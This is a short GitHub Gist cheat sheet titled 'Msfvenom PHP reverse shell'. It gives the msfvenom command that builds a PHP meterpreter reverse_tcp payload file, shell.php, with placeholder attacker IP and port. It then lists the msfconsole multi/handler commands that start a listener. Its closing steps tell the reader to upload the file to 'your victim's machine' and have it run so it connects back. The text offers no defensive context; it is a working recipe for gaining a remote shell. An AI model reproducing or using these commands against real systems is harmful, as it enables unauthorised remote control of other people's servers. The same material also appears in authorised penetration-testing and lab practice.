Last active
August 27, 2022 14:14
-
-
Save ddff7/2d189ef5e3df78f46051b4fe025cf6e3 to your computer and use it in GitHub Desktop.
Msfvenom PHP reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##This will create the payload file "shell.php" with your ip and port. | |
| msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php | |
| ##You can always "nano" the file to change your ipaddr and port incase you messed up the first step. | |
| #Run 'msfconsole' to start the listener then run the following command. | |
| use exploit/multi/handler | |
| set PAYLOAD php/meterpreter/reverse_tcp <-------- IMPORTANT!!!!! | |
| #set your ipaddr | |
| set LHOST <$LOCAL_IP> | |
| #set your listening port | |
| set LPORT <$LOCAL_PORT> | |
| #"show options" to check ur steps then run the command "exploit" | |
| exploit #this will start the listener | |
| #Upload "shell.php" to your victim's machine. | |
| #The victim's machine will need to run the file to connect back to your machine. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment